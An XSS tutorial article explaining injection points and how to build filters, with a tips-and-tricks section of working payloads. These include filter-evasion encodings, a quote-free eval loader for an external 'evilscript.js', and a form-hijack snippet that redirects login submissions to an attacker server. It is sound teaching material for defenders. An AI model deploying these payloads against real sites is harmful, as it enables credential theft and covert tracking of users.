Real World XSS
Author: David Zimmer <dzzie@yahoo.com>
Site: http://sandsprite.com/Sleuth
Article Downloads: small_xss_utilities.zip
Section 1
- Introduction
- Prerequisites
- About the Article Downloads
- Impacts (Attack Scenario)
- Impact Summary
Section 2 - Methods of Injection, and filtering
- Injection Points
- Injection methods and filtering
- XSS scripting tips and tricks
Section 3 - Inside the mind, mental walk along of a XSS hack
Section 4 - Conclusion
INJECTION POINTS
The next logical step in understanding XSS is to enumerate its injection points.
Where can our web applications fall victim? Since XSS works as an interaction with
active server content, any form of input must be filtered if it will ever show up
in an HTML page.
The default example, and the easiest to exploit, is parameters passed in
through query string arguments that get written directly to the page. These are
enticingly easy because all of the information can be provided directly in a
clickable link and does not require any other HTML to perform.
Many web authors feel that making their page respond only to POSTed
inputs gives them an added layer of security against these types of attacks. While
this can be true if coupled with other preventive measures, anywhere I can inject
an HTML form and have the user click a submit button, I can get them to POST to
that form (and yes, the form can be hidden and the submission easily automated).
The above two examples describe active XSS attacks: attacks in which the user
has to take an action and make a choice in order to be hit. This gives the user
the opportunity to examine the link or to discover us, which is no good from the
exploiter's view. Sure it works, but it is too dependent: it relies on us not
getting caught and on the user caring enough to take some action.
More dangerous are passive XSS attacks. These are
defined as attacks I can perform where the user does not have to take any action:
they do not have to click on any link, and they have no idea that anything
out of the ordinary is occurring. These attacks happen automatically and can hit
very large audiences completely silently.
If the user takes no action, how does the malicious data make it to
them? Database storage. Think of a messageboard: if I were able to post active
scripting in my post, anyone who viewed my page would automatically execute
whatever I could cook up without even knowing it. Think laterally for a second
and you will quickly realize that any data your web app stores that eventually
makes it back for surfer viewing is a potential target for a malicious user to
build a passive XSS attack on.
This is how I achieved the XSS user tracking mentioned in the above
example. I was performing a security audit for a large forum site. The site allowed
users to post articles and discussions and kept a marquee of the top 10 as part of its
default page template. Every single page on the site had this marquee, and through
parameter manipulation and its subsequent database storage, I was able to have the
server output my tracking code to every single surfer on the site.
I sat back, watched, and catalogued all of the site's users as they navigated
amongst the pages. Had this not been just a demonstration, I could literally have
linked usernames and email addresses to those observed surfing habits. Probably not
something you would desire for your prized user base.
Sites that are particularly vulnerable to this form of attack include
guest books, HTML chatrooms, messageboards, discussion forums, etc. If you have any
of these on your site, pay particular attention to filtering user-supplied data. If
you do find an XSS hole on your site, you must also make sure to scrub your database
to break any existing code that may already be stored away. When you are doing
the filtering, remember to use case-insensitive searches; it is a simple mistake but
much too easily overlooked.
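As a minimal sketch of the case-insensitivity point, here is a detector (not a sanitizer; that comes later in the article) that scans stored text for the handful of tokens that enable scripting. The token list is illustrative only, a real filter must cover far more:

```javascript
// Case-insensitive scan for script-enabling tokens in stored data.
// The /i flag is the whole point: "<ScRiPt>" and "OnError=" are caught
// just as readily as their lowercase forms.
function looksLikeScript(text) {
  return /<\s*script|javascript:|vbscript:|on\w+\s*=/i.test(text);
}
```

A case-sensitive version of the same check would wave "&lt;ScRiPt&gt;" straight through, which is exactly the simple mistake described above.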
Another note worth throwing in here: as business apps with private
intranets and integrated web applications become more prevalent, even Windows
developers have to start concerning themselves with the dangers of cross site
scripting. In a humorous example, the other day at work I was able to enter HTML
code in a business app we are developing, which in turn was displayed in the web
app interface we had integrated with it. This adds a whole new dimension to XSS
and even SQL injection attacks, but alas I digress.
One last injection point to consider is your error pages. Some servers include
special "404 Page Not Found" or servlet error messages that detail the page that was
requested or the parameters passed in. If these elements are not filtered, they
provide a perfectly overlooked breeding ground for XSS injection.
INJECTION METHODS AND FILTERING...
Now that we have a handle on the breadth of the problem, and where the
malicious input may come from...we have to understand just what data may be thrown
at us and how to combat it.
Active XSS is relatively easy to prevent by filtering out a series of
characters in any user input received. Since each page has a defined window
of inputs, they can all be filtered in a quite logical sequential way.
When we migrate to shielding against passive XSS attacks, it is somewhat
of a different story. Often user information and data is taken in through a series
of web forms, the final pages being a conglomeration of many users' supplied data.
Of course, again, all input data must be filtered, but typically there are many more
places for error to crop up. This problem is compounded by the desire for many of
these types of data-storage web applications to allow the user to enter some HTML
input.
HTML is a very dynamic and free-flowing language, something that allows the web
to be as advanced and colorful as it is, and also something that can make it a
nightmare to parse and filter. To make matters even worse, browser technology and
features are expanding at an incredible rate. While this makes the web fun and
dynamic, it makes the security auditor's job more difficult. How can you expect a
legacy web application to take into account new features, protocols and attack
vectors? You can't.
The easiest way to deny cross site scripting (and probably the only really
secure way) is to deny users the ability to use any form of HTML in their data. If
you would like to allow HTML, just realize that your filtering routines must be
designed very wisely. Many very large, high-profile sites have had XSS holes
discovered in them as the result of filter loopholes, including Yahoo and Hotmail.
The next logical step is to see some examples of just how XSS can get
inserted into a page. I have created a simplistic ASP page that will walk you through
some common injection points and example exploitations of them. Please take a few
minutes to read through it and play with the examples. To see how it all works, right
click, view source, and identify where the injection occurred.
[ insert url of demo page here ]
FILTERING
Filtering can be both a relatively simple matter and a vastly complex one at
the same time. The incongruence lies in the extent of your needs. Your server
side scripting language of choice can also help you minimize your exposure.
Before we get into active server languages, let me admit I am most familiar
with ASP, so that is where the heft of my examples shall rest.
Let's assume you have a parameter coming in that you expect to be an integer. That
assumption can often be your downfall, which incidentally is also why these types of
parameters are often found to be SQL injection points as well. Anyway, integer types
are easy to filter. Actually, we can let the ASP engine cleanse these for us in
one step. Consider the ASP line:
x=cInt(Request.QueryString("num"))
What happens if our friend num is not an integer? The ASP engine throws an error:
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'
Well, that handles that. In Perl, I believe simply adding +0 to the variable will
have a similar effect and force the variable to be numeric.
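The same "cast early, fail loudly" idea can be sketched in JavaScript. Note that parseInt alone is too forgiving ("5&lt;script&gt;" parses as 5), so the whole string is validated before the value is trusted:

```javascript
// Validate that the raw parameter is entirely an integer before using it.
// parseInt by itself would silently accept "5<script>" as 5, which defeats
// the point of the check.
function toSafeInt(raw) {
  if (!/^-?\d+$/.test(raw)) {
    throw new TypeError('Type mismatch: expected an integer, got ' + JSON.stringify(raw));
  }
  return parseInt(raw, 10);
}
```

Like the cInt call, the bad input dies in one step with a type error instead of flowing onward into the page.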
But what about string types? That is where the brunt of the work is going to lie
and where all of the problems begin. If we do not want to allow any HTML input
whatsoever, then our job is simple: remove all < signs and quotes and we should
be pretty safe, as long as any HTML we insert into dynamically is always wrapped
in a quoted string. Note, though, a page source something like:
<img src=/images/img<%Response.Write(Request.QueryString("nextimg"))%>>
In this example, removing quotes and < will make it very hard for an attacker to
create a usable attack, but I would not venture to say impossible.
Since the src= attribute is not quoted in any way, there is nothing for
them to have to break out of. If the nextimg value merely contains a space,
they will effectively be out of the src= attribute and able to insert their own
code such as onerror=. Even though technically they will be able to execute code
with this technique, scripting without the use of quotes is extremely hard (or at
least I haven't discovered the trick to it yet); see the tips and tricks section
for some techniques I am playing with to try to work around it.
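To see why the unquoted attribute is the weak point, here is a sketch mirroring that ASP template in JavaScript (the renderImg function and the onerror value are illustrative, not from the article's demo page):

```javascript
// Mirror of the vulnerable template: the parameter is concatenated into an
// UNQUOTED src= attribute, so a single space ends the attribute value and
// whatever follows becomes a new attribute.
function renderImg(nextimg) {
  return '<img src=/images/img' + nextimg + '>';
}

var benign  = renderImg('1.jpg');
var hostile = renderImg('1.jpg onerror=somecode'); // space breaks out of src=
```

No quote or < character was needed to escape the attribute; had the template emitted src="..." instead, the space trick alone would not have worked.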
The last category, and the most in-depth to cover, is the technique and
considerations of allowing only some HTML content while trying to deny the use of
malicious HTML and scripting.
Users of these techniques include web mail providers, message boards and
HTML chatrooms. Before we go into script filtering, we should expand on the
definition of malicious HTML some. If an attacker's goal is only to whack your site,
he might be just as content to make your new message board unusable to others as he
is to use it to exploit all your surfers. This could easily be done through pure HTML
tags with no attributes. It is doubtful that you would want your users to have the
ability to enter a <plaintext> tag that would turn the rest of your HTML page and
forms into an unusable blob of text. It is also unlikely that you would want them to
embed a 10000000 x 10000000 image of two elephants mating. When it comes to allowing
users to post HTML, just beware that you are in it for the long haul, both in
maintaining your filters to current technological demands and in accommodating
non-script-based attacks.
Enough digression. On to the filters. A good disclaimer to enter here is that I am
not that experienced in creating keyword filters; when it comes to my own projects,
I simply allow no HTML at all. I do, however, have a lot of experience working
around filters and have read a lot of discussions, so with that in mind, here we go.
The only sane implementation I have heard of is allowing a very confined list
of HTML tags and denying all others. This could be implemented by
splitting the text blob at all < signs and then reading up to the first space in
each element to see what the tag type is. If the tag is recognizable and allowed,
then grab the offset of the closing tag and replace the substring with a clean,
no-attribute version of it. If the tag is not allowed, it is removed. If
the tag was not allowed and did not contain a closing >, then... ummm, I don't
know; I would have to define the filter and experiment a lot :)
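The approach above can be sketched in a few lines of JavaScript. This is deliberately small and regex-based, a real filter must also handle malformed tags, nesting, and the attribute carry-over for img src= and a href= described next; the allow-list here matches the safe list given below:

```javascript
// Whitelist filter sketch: every tag is reduced to its bare name; allowed
// names are re-emitted with NO attributes, everything else is dropped.
var ALLOWED = { b: 1, i: 1, u: 1, font: 1 };

function whitelistFilter(text) {
  return text.replace(/<\s*(\/?)\s*([a-z0-9]+)[^>]*>/gi, function (m, slash, name) {
    name = name.toLowerCase();
    // Recognized tag: rebuild it clean, stripping every attribute
    // (onclick=, style=, etc. all vanish here).
    if (ALLOWED[name]) return '<' + slash + name + '>';
    // Unrecognized tag (script, plaintext, img, whatever): remove outright.
    return '';
  });
}
```

Note the unclosed-tag case the article shrugs at: a < with no matching > simply will not match this pattern and survives as literal text, which is one reason a production filter needs more than one regex.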
For tags where you absolutely have to allow attributes, such as img src=, I would
grab the necessary src= attribute, validate it, and then insert it into my own
clean img src= tag so I didn't have to worry about any event handlers or lowsrc or
dynsrc or the like. The same technique would be applied to href= attributes. A safe
list of tags to allow along these guidelines would be:
<font face= size=></font>
<b></b>, <i></i>, <u></u>
<img src=>
<a href=></a>
Etc., etc. Really, this is probably all I would allow by default. If you need more,
follow the above guidelines on implementation.
So, assuming you follow the above guidelines and allow no tags and no attributes
other than those you copy over to the saved data, what will you have to validate to
make sure your users are safe?
If the above list is all you allow, I will assume you can manage validating the
font size= and face= parameters. Img src= and href= are two big ones, worthy of
many debates and holding many dangers, that I will attempt to present next.
Let's first look at our img src= tag. We have cleansed it of all the tricks of
lowsrc, dynsrc, event handlers and style elements simply by parsing out the src=
element. Now we must validate it.
I am walking through thoughts here as we go, so please forgive any jumps.
1) We have to quote the src= string to be safe and to accommodate URLs with spaces.
2) We should remove all single and double quotes in it.
3) I would reject any URL with a ? querystring identifier in it and make sure
that it does not have .cgi, .pl, .php, .asp, etc. in it. Sure, we could
make a .jpg a Perl script, but we can't account for every loophole, and this is
already an overcautious measure against webbugs.
4) Next I would check the protocol. I would deny anything that isn't explicitly http://
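The four steps can be sketched as one validator. The extension list is illustrative rather than exhaustive, and the function simply rejects (returns null) on any failure rather than trying to repair the URL:

```javascript
// Validate an img src= URL per the four steps above; return a clean quoted
// attribute, or null if any check fails.
function cleanImgSrc(url) {
  url = url.replace(/["']/g, '');                    // step 2: strip all quotes
  if (url.indexOf('?') !== -1) return null;          // step 3a: no query strings
  if (/\.(cgi|pl|php|asp|aspx|jsp)\b/i.test(url)) {  // step 3b: no server scripts
    return null;
  }
  if (!/^http:\/\//i.test(url)) return null;         // step 4: http:// only
  return 'src="' + url + '"';                        // step 1: always emit quoted
}
```

Because anything that is not explicitly http:// is denied, javascript:, vbscript:, file:// and any oddball registered protocol handler all fail the same single check.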
So what do these filters prevent?
Quoting the string makes sure they cannot escape the element attribute and insert
their own event handlers. This must be done in conjunction with step 2, replacing
all quotes. Actually, you probably don't have to replace both kinds, just the ones
you use to quote the string in your src= element.
Denying all URLs (for img src= at least) that have a ? or reference a server
script denies users the ability to webbug your surfers. The danger here would be
someone collecting stats on your users and site, tracking users across pages by
their referrer.
!!Note that any link aiming off-server will reveal HTTP Referer headers. This is a
major reason why web developers are told not to include important info in query
strings, and how I used to collect admin logins to chat servers :P (It may also be
a good idea to add target=_blank to all links to avoid a possible referrer leak
[but there will always be a referrer leak for img src= tags].)
Next we validate the protocol. For obvious reasons, we probably don't want to allow
the file:// protocol on links or images. For equally obvious reasons, vbscript:
and javascript: would be an unpleasant experience. In the end, it is best not
to worry about what is there, and only worry about what isn't: no http:// at the
beginning of the string, then deny the tag. The reason is that it is relatively easy
to add protocol handlers to Windows. aim:// has its own handler that may have been
found vulnerable, as has icq://; if these protocols are present in an img tag, that
may be enough to make the browser fire the registered program.
As a humorous example, back in the days of IE5 I used to embed
an img src=telnet://myip:23 and then run a custom daemon. All of a sudden my friends
would complain that some window had popped up and that someone was typing text to
their screen! Heh, parlor tricks, gotta love 'em. On a more serious note, you can
see the possible danger.
One other thing I just thought of is the possible danger of line-break tricks.
If you follow the above explicitly you should be OK, but if you vary at all,
you should be aware that there is a whole subsection of filter-bypassing techniques
based on inserting CR, LF or CRLF into input strings. I have also seen javascript
execute with a line break splitting the keyword up. Consider how these may impact
your filters.
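A quick sketch of why these tricks work against naive keyword filters: the dangerous token is split by a newline, so a plain substring check never sees it. Normalizing the input first closes that particular gap:

```javascript
// A naive substring check misses "javascript:" when a line break splits it;
// stripping CR/LF/tab before matching catches the same payload.
function naiveCheck(s)      { return s.indexOf('javascript:') !== -1; }
function normalizedCheck(s) { return naiveCheck(s.replace(/[\r\n\t]/g, '')); }

var payload = 'javasc\nript:alert(1)'; // the line-break trick from the tips section
```

The browser happily reassembles the split protocol name; the filter has to do the same reassembly before it can hope to match.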
That should give you the basis for a sane implementation of a minimal-content
keyword filter. If you try to base your filters on just replacing keywords, you are
going to run into all kinds of complexities: new elements, attributes you didn't
know about, weird event handlers, script encoding, and even multiline tags that can
throw your parsing for a loop. If you want to try any of those techniques, may the
force be with you, Luke *breathes like Darth Vader*
XSS SCRIPTING TIPS AND TRICKS
Well, I couldn't resist this section; this is where I have my most fun anyway.
These are some of the techniques people can hit you with using XSS.
Q) Just how much script can you inject in an image src tag?
A) It's a different style of coding, but it can get quite complex :)
<img src="javascript:txt='UghhOghh.!!! My Screen Just Ran Away!!!';
txt2='Now come on you have to admit that was funny *S*';x=0;y=80;
function niceguy(){nice=confirm(txt2);
if(nice==1){window.setTimeout('parent.window.moveTo(0,0)',2100)};}
function ha(x){parent.window.moveTo(x,y);if(x==1800)alert('Hehehe...me went Bye-bye ; )');
window.setTimeout('if(x!=1800){ha(x+=30)}else{niceguy()}',25)};
alert('*Yawn*..me tired');ha(0);">
|
Q) What are the biggest tricks useful in XSS javascripting?
1) Knowing how to embed nested quotes is a necessity. You can escape
quotes in a quoted string like this: \' or \", or you can use
the unicode equivalents \u0022 and \u0027
ex: alert("\u0022") or alert("\"")
2) Keyword filters that allow any JS to execute are useless
ex: a='navi';b='gator.userAgent';alert(eval(a+b))
3) Short input length + script block embed = unlimited script power if
you can squeeze in a script src=
4) SSL pages warn if script src= comes from an untrusted site, but if you
can upload anything to the server, like an image or article that is
actually .js file commands, you can bypass this warning because
script src=file.jpg works (also useful to help bypass input length
requirements). (Also note IE doesn't care a wink about file extensions
on script src= files :)
5) You can read an entire page's content with javascript in IE; you are not
just limited to manipulating form elements. You can also edit the page
on the fly. Learn your DHTML object model, Daniel-san!
6) Event stealing: say a page with a login form has an XSS hole,
document.forms[0].onsubmit=myfunction
document.forms[0].btnNew.onclick=myfunction
document.forms[0].action="http://myserver/myscript.asp"
7) Styles trickery. I have to learn these tricks too! But from what I have
heard hinted at and mentioned in passing, there are some cool power
tricks to be had!
8) Be familiar with methods of script encoding.
<img src='vbscript:do%63ument.lo%63ation="http://www.yahoo.com"'>
<IMG SRC="javascript:alert('test');">
<IMG SRC="javasc ript:alert('test');"> <-- line break trick
\09 \10 \11 \12 \13 as delimiters all work.
9) Working with no quotes (also necessary when dealing with injection on
PHP scripts). With PHP scripts, any " or ' we inject is automatically
turned into \" and \' respectively :( This is a big problem for complex
scripts. It kinda works OK for event handler insertion: we can still
close the parent quotes because HTML doesn't understand the \" escape
sequence and only sees the ". This would let us get away with simple
things using only strings already found in the document, numbers,
variables, etc., but what if we need to include our own string?
chew on this:
regexp = /this is my string its actually a reg expression/
alert(regexp.source)
I haven't really decided how useful an evasion this is yet. I myself
am still chewing away, like on overcooked steak. With this we can get
away with no quotes; however, / characters, which we need for URLs, are
special chars and need to be escaped in the regexp, and PHP takes \
(which is the regexp escape char) as an escape char and escapes it to
\\, so that is confusing. However, we also have the power of regexps in
our toolbox, and we have a host of built-in objects to generate and
build up strings from, so something like:
n=/http: myserver myfolder evilscript.js/
forslash=location.href.charAt(6)
space=n.source.charAt(5)
alert(n.source.split(space).join(forslash))
//document.scripts[0].src = n.source.split(space).join(forslash)
A little tricky, but doable; that chewed well after all *yummie*.
Another trick that could be useful with the no-quotes hack is a simple
script encoder, such as the below example:
pcent=/%/.source
str=/20616c657274282774686973206973207265616c6c7920636f6f6c212729/.source
temp=str.substring(0,0)
for(i=0;i<str.length;i+=2){temp+=pcent+str.substring(i,i+2)}
eval(unescape(temp))
Voila, complex embeddable scripts with no quotes or forward slashes.
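You can verify what that hex blob decodes to without eval-ing it; the sketch below reproduces the encoder's string-building loop and just inspects the unescaped result (unescape is the same legacy global the payload relies on):

```javascript
// Reproduce the encoder's loop: turn the hex-digit regexp source into a
// %XX-encoded string, then decode it with unescape to see the payload.
var pcent = /%/.source;
var str = /20616c657274282774686973206973207265616c6c7920636f6f6c212729/.source;
var temp = '';
for (var i = 0; i < str.length; i += 2) {
  temp += pcent + str.substring(i, i + 2); // e.g. "20" becomes "%20"
}
var decoded = unescape(temp); // the script the payload would eval
```

Note that neither the encoded form nor the loop contains a single quote character or forward slash outside the regexp literals, which is the whole point of the trick.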
|